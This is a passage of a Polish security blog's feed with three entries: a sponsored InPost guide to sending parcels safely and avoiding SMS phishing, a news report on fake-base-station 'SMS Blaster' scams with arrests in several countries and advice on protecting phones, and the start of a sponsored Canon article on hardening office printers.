<p class="p3">Najmocniejszy punkt aplikacji jest bardzo konkretny: <b>InPost Mobile pozwala nadać paczkę bez drukowania etykiety</b>. Po uzupełnieniu danych i opłaceniu przesyłki użytkownik dostaje w aplikacji <b>9-cyfrowy kod nadania oraz kod QR ważny przez 30 dni</b>. Z ich użyciem można dokończyć <b>nadanie paczki</b> poprzez Paczkomat lub Appkomat.</p>
<p class="p3">To rozwiązanie jest wygodne, ale jego znaczenie nie sprowadza się do wygody. Kiedy płatność, kod i samo nadanie są zamknięte w jednym oficjalnym narzędziu, użytkownik rzadziej zaczyna szukać informacji po mailach, zrzutach ekranu i wiadomościach SMS. A właśnie w takim rozproszeniu najłatwiej o błąd.</p>
<p class="p3">Przy samym urządzeniu proces też został uproszczony. InPost podaje, że <b>skrytkę można otworzyć zdalnie z poziomu aplikacji</b>, a alternatywą jest zeskanowanie kodu QR. Mniej kroków oznacza tu nie tylko oszczędność czasu, ale też mniej okazji do nerwowych decyzji.</p>
<p><a href="https://inpost.pl/SzybkieNadania"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2-600x401.jpg" alt="" width="600" height="401" class="aligncenter size-large wp-image-27042" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2-600x401.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2-350x234.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2-768x513.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2.jpg 1120w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Jak bezpiecznie nadać paczkę?</h3>
<p class="p3">Samo <b>nadanie paczki przez Paczkomat</b> zostało maksymalnie uproszczone. W aplikacji <b>InPost Mobile</b> cały proces można przejść bez drukowania etykiety:</p>
<ul class="ul1">
<li class="li3">otworzyć aplikację <b>InPost Mobile</b>,</li>
<li class="li3">wybrać opcję <b>„Nowa przesyłka”</b>, a następnie <b>„Nadaj”</b>,</li>
<li class="li3">wskazać <b>rozmiar paczki</b> i <b>sposób dostawy</b>,</li>
<li class="li3">wpisać <b>dane odbiorcy</b>,</li>
<li class="li3">opłacić przesyłkę online,</li>
<li class="li3">odebrać <b>kod nadania</b> oraz <b>kod QR</b>,</li>
<li class="li3">przy dowolnym automacie <b>Paczkomat</b> otworzyć skrytkę zdalnie w aplikacji, zeskanować kod QR albo wpisać kod na ekranie urządzenia,</li>
<li class="li3">włożyć paczkę do środka, zamknąć skrytkę i <b>potwierdzić nadanie</b>.</li>
</ul>
<p class="p3">To rozwiązanie jest wygodne zwłaszcza wtedy, gdy liczy się czas. <b>Nadanie paczki</b> można zrealizować o dowolnej porze, bez stania w kolejce, bez drukowania etykiety i bez dopasowywania planu dnia do godzin otwarcia placówki.</p>
<p class="p3">Jeśli wolisz, skorzystaj z nadania paczki przez <b>oficjalną stronę InPost: </b><a href="https://inpost.pl/SzybkieNadania"><span class="s3">https://inpost.pl/SzybkieNadania</span></a>.</p>
<h3>Najsłabszym ogniwem bywa wiadomość spoza oficjalnego kanału</h3>
<p class="p3">W praktyce problemem nie jest dziś samo <b>nadanie paczki</b>, tylko wszystko, co dzieje się wokół niego. Wiadomość o dopłacie. Link do „potwierdzenia danych”. SMS, który wygląda zwyczajnie, bo zawiera słowo „paczka” i odwołuje się do pośpiechu. To znany mechanizm. InPost ostrzega, że <b>nigdy nie wysyła SMS-ów z informacją o dopłatach</b>, a podejrzane komunikaty należy sprawdzać u źródła.</p>
<p class="p3">Ten kontekst bezpieczeństwa jest dziś równie ważny jak sama wygoda nadania. Rządowe materiały przypominają, że podejrzane SMS-y można zgłaszać do CERT Polska na numer 8080, najlepiej przekazując całą wiadomość w oryginalnej formie. <b>Najbezpieczniejsze nadanie paczki to takie, które użytkownik prowadzi w jednym oficjalnym kanale i bez odruchowego klikania w linki.</b> To praktyczny wniosek z zaleceń InPost oraz CERT Polska.</p>
<p class="p6">
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3-350x232.jpg" alt="" width="350" height="232" class="aligncenter size-medium wp-image-27041" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3-350x232.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3-600x398.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3-768x509.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3.jpg 1110w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<h3>Co naprawdę warto zrobić przed nadaniem paczki?</h3>
<p class="p3">Najprostsze zasady zwykle działają najlepiej:</p>
<ul class="ul1">
<li class="li3"><b>dobrze zabezpieczyć zawartość i wypełnić wolne przestrzenie w opakowaniu,</b> żeby przesyłka nie przemieszczała się w środku;</li>
<li class="li3"><b>nadać paczkę przez InPost Mobile </b>bez etykiety, zamiast rozpraszać proces między różne kanały;</li>
<li class="li3"><b>sprawdzać kody i przebieg nadania w aplikacji,</b> a nie w podejrzanych wiadomościach;</li>
<li class="li3"><b>nie reagować odruchowo na SMS o dopłacie albo „problemie z przesyłką”,</b> tylko zweryfikować sprawę u źródła;</li>
<li class="li3"><b>aktualizować aplikację i zabezpieczyć telefon hasłem lub biometrią,</b> bo to ogranicza najprostsze scenariusze nadużyć;</li>
<li class="li3"><b>podejrzane SMS-y przekazywać do CERT Polska na 8080.</b></li>
</ul>
<h3>Wniosek</h3>
<p class="p3">W dobrze ułożonym procesie InPost Mobile nie jest gadżetem, tylko narzędziem, które domyka nadanie paczki w jednym miejscu: od opłacenia przesyłki po kod potrzebny do otwarcia skrytki. To porządkuje proces. Uspokaja go. I ogranicza liczbę momentów, w których użytkownik działa chaotycznie.</p>
<p class="p3"><b>Dobrze zorganizowane nadanie paczki to mniej chaosu, mniej błędów i mniej okazji dla oszustów.</b> Fałszywe komunikaty o przesyłkach niestety stały się jednym z najprostszych narzędzi phishingu, a więc przewidywalność jest realną wartością.</p>
<p><em>Autorem niniejszego artykułu jest firma InPost, a za jego publikację otrzymaliśmy wynagrodzenie</em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/#comments" rel="replies" thr:count="2" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/feed/atom/" rel="replies" thr:count="2" type="application/atom+xml"/>
			<thr:total>2</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Jeżdżą po mieście i atakują telefony korzystając z SMS Blasterów ukrytych w bagażnikach]]></title>
		<link href="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27050</id>
		<updated>2026-04-29T08:05:31Z</updated>
		<published>2026-04-28T10:41:18Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="banki"/><category scheme="https://niebezpiecznik.pl" term="BTS"/><category scheme="https://niebezpiecznik.pl" term="IMSI Catcher"/><category scheme="https://niebezpiecznik.pl" term="jaskółka"/><category scheme="https://niebezpiecznik.pl" term="Kanada"/><category scheme="https://niebezpiecznik.pl" term="MITM"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="SMS Blaster"/><category scheme="https://niebezpiecznik.pl" term="smsishing"/><category scheme="https://niebezpiecznik.pl" term="telefonia komórkowa"/><category scheme="https://niebezpiecznik.pl" term="Toronto"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Wyobraź sobie, że stoisz w korku. Albo spacerujesz po chodniku z psem. Tymczasem w samochodzie na światłach siedzi typ, który uśmiecha się i w tym samym momencie zarabia tysiące złotych. Bo w bagażniku samochodu ma &#8220;SMS Blastera&#8220;. Tym sprzętem przejmuje łączność Twojego smartfona i wstrzuje Ci SMS-a z informacją od Twojego banku. A facetowi w garniturze, który [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/"><![CDATA[<p>Wyobraź sobie, że stoisz w korku. Albo spacerujesz po chodniku z psem. Tymczasem w samochodzie na światłach siedzi typ, który uśmiecha się i w tym samym momencie zarabia tysiące złotych. Bo w bagażniku samochodu ma &#8220;<strong>SMS Blastera</strong>&#8220;. Tym sprzętem przejmuje łączność Twojego smartfona i wstrzuje Ci SMS-a z informacją od Twojego banku. A facetowi w garniturze, który właśnie Cię minął, SMS-a o &#8220;niezapłaconej paczce&#8221;. Co najgorsze, przed tym atakiem nie obronią Cię żadne filtry po stronie operatora&#8230;<span id="more-27050"></span></p>
<div id="attachment_27052" style="width: 610px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-scaled.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-27052" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-600x337.jpg" alt="" width="600" height="337" class="size-large wp-image-27052" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-600x337.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-350x197.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-768x432.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-1536x863.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-2048x1151.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a><p id="caption-attachment-27052" class="wp-caption-text">SMS Blaster wykorzystywany przez gang w Turcji</p></div>
<h3>SMS Blastery w natarciu</h3>
<p>W ciągu ostatnich miesięcy służby w różnych częściach świata zatrzymały osoby korzystające z tzw. &#8220;SMS Blasterów&#8221; ukrytych w samochodach. SMS Blastery to odpowiednio skonfigurowane <strong>IMSI Catchery</strong>, czyli fałszywe stacje <strong>BTS</strong>, które <strong>przepinają na siebie sygnał telefonii komórkowej okolicznych smartfonów</strong>, a następnie wysyłają na te smartfony wiarygodnie wyglądające SMS-y podszywające się pod różne instytucje. </p>
<p>Efekt? Taki sam jak przy <a href="https://niebezpiecznik.pl/post/spoofing-sms-czyli-falszowanie-nadawcy-sms-a/" target="_blank">spoofingu SMS</a>, ale atak tego typu <strong>nie jest możliwy do odfiltrowania przez operatorów, bo nie przechodzi przez ich infrastrukturę</strong>. Jest też dodatkowe zagrożenie wynikające z tego ataku &#8212; <strong>ofiary nie mogą korzystać z połączeń alarmowych</strong>, co może skończyć się tragiczniej niż strata pieniędzy.  </p>
<h3>Jak to działa i dlaczego jest groźne?</h3>
<p>Ten atak w brutalny sposób wykorzystuje to, jak zaprojektowane są sieci komórkowe. Telefony komórkowe automatycznie łączą się z nadajnikiem o najsilniejszym sygnale. Gdy &#8220;SMS Blaster&#8221; znajdzie się blisko Ciebie &#8212; na przykład w stojącym obok na światłach aucie &#8212; Twój telefon bez Twojej wiedzy przeloguje się do przestępczej sieci. Wtedy atakujący może zrobić kilka groźnych rzeczy:</p>
<ul class="margin">
<li>Wysłać Ci SMS-a z fałszywym linkiem (tzw. smishing), swobodnie podmieniając pole nadawcy. Operator Twojej sieci nawet tego nie zauważy, w przeciwieństwie do ataków wykorzystujących różne internetowe bramki do fałszowania nadpisu SMS, które <a href="https://niebezpiecznik.pl/tag/spoofing-sms/" target="_blank">regularnie opisujemy</a>.</li>
<li>Odciąć Cię od prawdziwej sieci operatora, uniemożliwiając korzystanie ze smartfona także do wezwania pomocy </li>
<li>Pobrać identyfikujące Cię metadane, które następnie można wykorzystać do &#8220;śledzenia&#8221; Twojej lokalizacji. Przy czym SMS Blastery nie są tym zainteresowane, to raczej domena profesjonalnych IMSI Catcherów wykorzystywanych przez służby (które swoją drogą nazywają je &#8220;jaskółkami&#8221;). </li>
<li>Podsłuchać prowadzone przez Ciebie rozmowy telefoniczne lub nieszyfrowany ruch internetowy. Aby tego dokonać urządzenie musiałoby wykonać atak MITM, złamać szyfrowanie (co jest możliwe dla niektórych standardów) lub wymusić połączenie po nieszyfrowanych protokołach. Ale to również domena IMSI Catcherów a nie SMS Blasterów, głównie ze względu na  koszt.</li>
</ul>
<p> <br />
<div id="attachment_27051" style="width: 610px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-27051" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-600x472.jpg" alt="" width="600" height="472" class="size-large wp-image-27051" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-600x472.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-318x250.jpg 318w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster.jpg 604w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a><p id="caption-attachment-27051" class="wp-caption-text">SMS Blaster &#8211; materiały policji</p></div></p>
<div class="info"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Przestępcy korzystają z różnych sztuczek i narzędzi, ale niezależnie od użytej przez nich metody ataku, jeśli jesteś dobrze przygotowany i zabezpieczony, ciężko będzie im wykraść Twoje dane lub pieniądze albo naruszyć Twoją prywatność. Pytanie, czy wiesz jak poprawnie się zabezpieczyć? Jeśli nie, <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-swojej-firmy/" target="_blank">zaproś nas do swojej firmy</a> &#8212; przeprowadzimy dla Was krótkie szkolenie i przygotujemy Was na wszystkie groźne sytuacje, jakie mogą Was spotkać. A jeśli jesteś osobą prywatną, to wpadnij na nasz otwarty wykład <a href="https://bilety.niebezpiecznik.pl" target="_blank">Jak Nie Dać Się Zhackować?</a>, który jest dedykowany osobom nietechnicznym i w trakcie którego uczymy jak zabezpieczyć się w kontekście prywatnym, a nie służbowym.</div>
<h3>Trójka z Kanady</h3>
<p>W kanadyjskim Toronto <a href="https://www.youtube.com/watch?v=H2JKpTmy5bc" target="_blank" rel="nofollow">aresztowano</a> trzech mężczyzn, którzy przez kilka miesięcy (!), bo co najmniej od listopada 2025, wozili po mieście sprzęt udający stację bazową (BTS). Według Toronto Police Service to pierwszy znany przypadek użycia takiej technologii w Kanadzie. Sprawa nosi kryptonim Project Lighthouse, a zatrzymanym postawiono łącznie 44 zarzuty.</p>
<h3>To nie są nowe ataki</h3>
<p>Tego typu ataki to nie nowość. Ponad 10 lat temu na rynku były dostępne tzw. SMS Messanging Gateways, które można było kupić przez chińskie portale. I które wtedy służyły bardziej do wysyłania SMS-owego spamu, reklam okolicznych biznesów. Dziś ta sama technologia jest wykorzystywana nie do napędzania klientów, a do kradzieży środków. Warto też wspomnieć <a href="https://www.youtube.com/watch?v=WGxF1N3RESQ" rel="nofollow">tę prezentację</a> z BlackHata z 2013 roku o bieda-imsi-catcherach z przerabianych femtocelli.</p>
<p>Incydent z Toronto to nie jedyny tego typu przypadek. W 2024 w Brazylii <a href="https://g1.globo.com/google/amp/sp/sao-paulo/noticia/2024/07/25/carro-do-golpe-policia-investiga-quadrilha-que-usa-veiculo-com-antena-e-computador-para-rastrear-celulares-e-aplicar-golpes-em-sp.ghtml" target="_blank"  rel="nofollow">rozbito</a> gang poruszający się Jeepem z potężną anteną w bagażniku i laptopem na tylnym siedzeniu. Zatrzymany kierowca otrzymywał 1000 reali tygodniowo za samo &#8220;wożenie się&#8221; po bogatych dzielnicach Sao Paulo. Sprzęt automatycznie namierzał telefony w promieniu 5 metrów i wysyłał SMS-y podszywające się pod znane banki. Podobny incydent miał miejsce w Omanie, gdzie policja <a href="https://commsrisk.com/chinese-tourist-caught-driving-smishing-sms-blaster-around-oman/" target="_blank"  rel="nofollow">zatrzymała</a> turystkę z Chin. Kobieta z wypożyczonego auta masowo rozsyłała linki phishingowe przy użyciu sms blastera.  </p>
<h3>Mam smartfona &#8212; co robić, jak żyć?</h3>
<p>Mając smartfona jesteś na ten atak podatny, niezależnie od rodzaju urządzenia czy systemu operacyjnego. Choć na razie brak doniesień o tego typu atakach realizowanych na terenie naszego kraju, warto dmuchać na zimne. Dlatego: </p>
<ul>
<li>Wyłącz obsługę przestarzałej sieci 2G w swoim smartfonie. Wiele tanich SMS Blasterów opiera się na tzw. &#8220;downgrade attack&#8221; do sieci drugiej generacji, z której łatwo przechwycić ruch.</li>
<li>Traktuj każdą wiadomość SMS jako całkowicie niezaufaną &#8212; bo taka de facto jest. </li>
<li>Ważne rozmowy prowadź przez szyfrowane komunikatory E2EE (np. Signal).</li>
</ul>
<p>Warto też wszelkie podejrzane trudności w nawiązaniu połączenia ze 112 zgłaszać do UKE. Kto wie, może przyczynicie się do wykrycia pierwszej tego typu operacji w Polsce.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/#comments" rel="replies" thr:count="21" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/feed/atom/" rel="replies" thr:count="21" type="application/atom+xml"/>
			<thr:total>21</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Dlaczego drukarki w stanie fabrycznym to stan zagrożenia, a nie gotowości]]></title>
		<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27035</id>
		<updated>2026-04-27T16:45:56Z</updated>
		<published>2026-04-27T11:55:07Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ARTYKUŁ SPONSOROWANY"/><category scheme="https://niebezpiecznik.pl" term="Canon"/><category scheme="https://niebezpiecznik.pl" term="drukarki"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-250x250.jpg 250w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4.jpg 480w" sizes="auto, (max-width: 100px) 100vw, 100px" /></a>Załóżmy, że masz poukładane serwery, endpointy, segmentację, EDR, SOC nie płacze. Czujesz spokój. Ogród zen. I wtedy przypominasz sobie o drukarkach. W rogu stoi MFP (ang. Multifunction Printer, drukarka wielofunkcyjna) . Niby mebel. A tak naprawdę: komputer z dyskiem, usługami sieciowymi, historią zadań, skanami, adresami e-mail i panelkiem, na którym ludzie klikają wszystko, co mruga. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/"><![CDATA[<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-600x263.jpg" class="aligncenter size-large wp-image-27048" width="600" height="263" alt="" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-600x263.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-350x153.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-768x336.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1.jpg 800w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Załóżmy, że masz poukładane serwery, endpointy, segmentację, EDR, SOC nie płacze. Czujesz spokój. Ogród zen. I wtedy przypominasz sobie o drukarkach. W rogu stoi MFP (ang. Multifunction Printer, drukarka wielofunkcyjna) . Niby mebel. A tak naprawdę: komputer z dyskiem, usługami sieciowymi, historią zadań, skanami, adresami e-mail i panelkiem, na którym ludzie klikają wszystko, co mruga. Jeśli zostawisz je w konfiguracji fabrycznej, to nie masz „drukarki”. Masz hosta z dość ciekawą powierzchnią ataku. I cyberninja o tym wie&#8230;<span id="more-27035"></span></p>
<div class="info">Ten tekst otwiera cykl o bezpieczeństwie urządzeń drukujących w środowisku firmowym. W kolejnych rozdziałach będziemy przechodzić przez etapy „<a href="https://niebezpiecznik.pl/samuraj" target="_blank">Drogi Samuraja</a>”: od stanu fabrycznego, przez hardening i monitoring, aż po druk w duchu Zero Trust i budowę spójnego ekosystemu obrony. Dlatego, jeśli chcesz podążać tą ścieżką razem z nami &#8211; śledź kolejne odsłony. Każda część cyklu będzie kolejnym krokiem na tatami, kolejnym elementem sztuki ochrony danych, której Samuraj nie odkłada na później.</div>
<p>&nbsp;<br />
SPIS TREŚCI</p>
<ul class="nomargin">
<li><a href="#rozgrzewka">Rozgrzewka na macie – ustawienia fabryczne jako punkt startowy</a></li>
<li><a href="#bezbronnosc">Nie jesteś bezbronny &#8211; utwardzanie urządzeń</a></li>
<li><a href="#hardening">Hardening drukarek – jak się do tego zabrać?</a></li>
<li><a href="#flota">Masz flotę? Potrzebujesz zarządzania</a></li>
</ul>
<p>Nie masz czasu na lekturę&nbsp;całości artykułu? Zacznij od filmu! Zobacz, jak patrzymy na to zagadnienie, a po konkrety i przykłady &#8212; kontynuuj lekturę artykułu.</p>
<p><iframe loading="lazy" width="560" height="315" src="https://www.youtube.com/embed/vL1NCmNj2Nc?si=zHx65UjMlM9rrvxA" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p><a name="rozgrzewka" href=""></a></p>
<h3>Rozgrzewka na macie</h3>
<p>Nowoczesne urządzenia wielofunkcyjne są projektowane tak, żebyś mógł je postawić i po 10 minutach usłyszeć: „drukuje!”. Dla użytkownika to ideał: zero pytań, zero błądzenia po ustawieniach, minimalny udział IT.</p>
<p>Takie urządzenie wydrukuje wszystko bez pytania o tożsamość użytkownika. Skanowanie i kopiowanie działają równie swobodnie: jeden szybki ruch, jeden „scan to email”, i dokument z pieczątką wylatuje poza firmę bez śladu w logach. A gdy urządzenie wystawia równocześnie panel webowy, SMB, FTP, WebDAV, SNMP czy IPP, otwiera w murach sieci tyle bram i furtek, ile dróg i ścieżek prowadzi do oblężonego zamku &#8211; i zazwyczaj nikt ich nie patroluje.</p>
<p class="p1">Do tego dochodzą nieszyfrowane transmisje i domyślne hasła administratora, które nadal są jednym z najczęstszych wektorów ataku.</p>
<p>Jednak <strong>z perspektywy bezpieczeństwa ustawienia fabryczne należałoby traktować wyłącznie jako tryb startowy</strong>.<span class="Apple-converted-space">&nbsp; </span>Urządzenie bez utwardzonej konfiguracji jest jak wojownik bez zbroi &#8211; pierwszy cios cyberninja może go powalić.</p>
<p><a name="bezbronnosc" href=""></a></p>
<h3>Dobra wiadomość: nie jesteś bezbronny.</h3>
<p class="p1">Zbroją, która będzie Cię chronić jest <strong>hardening urządzenia, </strong>czyli takie skonfigurowanie jego ustawień, żeby było trudniejsze do zaatakowania, przejęcia albo wykorzystania jako „furtka” do firmowej sieci.</p>
<p>Wystarczy, że robisz to raz, porządnie, a potem utrzymasz jako standard &#8211; w duchu <strong>NIST SP 800</strong> (800-53/171/88/40) &#8211; czyli zestawu wytycznych amerykańskiego National Institute of Standards and Technology dotyczących bezpieczeństwa systemów IT &#8211; i z kryptografią, której nie da się zbyć tekstem „to tylko drukarka” (<b>FIPS 140-3</b>).</p>
<p class="p1">&#8211; Utwardzanie MFP to nie jest ‘włączenie jednego checkboxa’. To dopasowanie urządzenia do polityk bezpieczeństwa organizacji &#8211; tak, żeby drukarka była tak samo przewidywalna i kontrolowana jak serwer czy laptop – komentuje <strong>Darek Szwed</strong>, <b>ekspert Canon Polska w obszarze bezpieczeństwa danych</b>.</p>
<p><a name="hardening" href=""></a></p>
<h3>Hardening drukarek: Jak się do tego zabrać?</h3>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po pierwsze: Rozpoznaj taktykę przeciwnika. Drukarka też ma swoje słabe punkty, które mogą stać się celem ataku.</p>
</blockquote>
<p class="p1">Zanim zaczniesz cokolwiek „zabezpieczać”, zrób ten prosty test mentalny: <strong>Czy pozwoliłbyś, żeby w twojej sieci stał komputer z dyskiem i kilkoma usługami, którego nikt nie patchuje, nikt nie loguje, a panel admina jest dostępny z VLAN-u użytkowników?</strong></p>
<p class="p1">Jeśli odpowiedź brzmi „nie”, to gratulacje. Przy okazji… właśnie opisałeś typową drukarkę w trybie fabrycznym.</p>
<p class="p1">Załóżmy, że firma dokonała dobrego wyboru – urządzenia drukujące spełniają normy bezpieczeństwa, mają certyfikowane moduły, wspierają szyfrowanie, audyt, kontrolę dostępu. To jednak tylko pozorne bezpieczeństwo.</p>
<p class="p1">Bo urządzenie „prosto z pudełka”: otwiera zbyt wiele portów, udostępnia zbędne protokoły, nie wymusza haseł, pozwala drukować wszystko każdemu, nie szyfruje transmisji, nie zapisuje logów, nie integruje się z żadną polityką firmy…</p>
<p class="p2">To jak posiadać najlepszy miecz… i walczyć gołymi rękami.</p>
<p class="p2">To nie jest teoria. To jest codzienność w biurach. Domyślna konfiguracja MFP jest <strong>wygodna</strong> dla użytkownika, ale <strong>zdradliwa</strong> dla bezpieczeństwa i <strong>śmiertelna</strong> dla infrastruktury.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po drugie: Nie klikaj na czuja. Użyj Security Settings Navigator</p>
</blockquote>
<p class="p1">Jeśli teraz myślisz: „OK, to wejdę w ustawienia i wyłączę wszystko” &#8211; stop.<br />
Samuraj nie macha mieczem na oślep.</p>
<p class="p1">W japońskim uniwersum <span class="s2"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></span> możesz sięgnąć po narzędzie typu <b><a href="https://www.canon.pl/business/solutions/security-navigator/" target="_blank">Security Settings Navigator</a></b>, które prowadzi cię przez hardening jak mistrz podczas treningu w dojo:</p>
<ul class="ul1">
<li class="li4">zadaje kilka pytań o środowisko (dosłownie kilka, bez doktoratu),</li>
<li class="li4">podpowiada zmiany zgodne z dobrymi praktykami NIST: minimalizacja uprawnień, ograniczenie usług, segmentacja, szyfrowanie,</li>
<li class="li4">na końcu daje ci konkretną listę ustawień do wdrożenia.</li>
</ul>
<p class="p1">&#8211; W praktyce drukarki rzadko mają<span class="Apple-converted-space">&nbsp; </span>przypisanego jednego „właściciela”, a w efekcie są trochę niczyje. Admin sieci widzi je jako kolejny adres IP do ogarnięcia, security skupia się na serwerach i firewallach, a sama drukarka ląduje gdzieś pomiędzy &#8211; podłączona do sieci, z własnym systemem i usługami, których nikt na co dzień nie pilnuje.</p>
<p><strong>Security Settings Navigator</strong> pomaga domknąć ten temat bez zgadywania. Zamiast klikania „na wyczucie” prowadzi krok po kroku i zamienia ogólne zasady bezpieczeństwa w konkretne, sensowne ustawienia urządzenia. Bez wróżenia z fusów i przypadkowego klikania wszystkiego, co da się wyłączyć – mówi <strong>Daniel Mazur,</strong> dyrektor działu technicznego w Inforoffice Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po trzecie: Spójrz zagrożeniom w oczy.</p>
</blockquote>
<p class="p1">Chcesz prostą zasadę NIST-ową, która robi największą różnicę? <strong>Powiąż operacje z tożsamością.</strong></p>
<p class="p1">Jeśli dziś u ciebie jest tak:</p>
<ul class="ul1">
<li class="li4">każdy może podejść i wydrukować/zeskanować,</li>
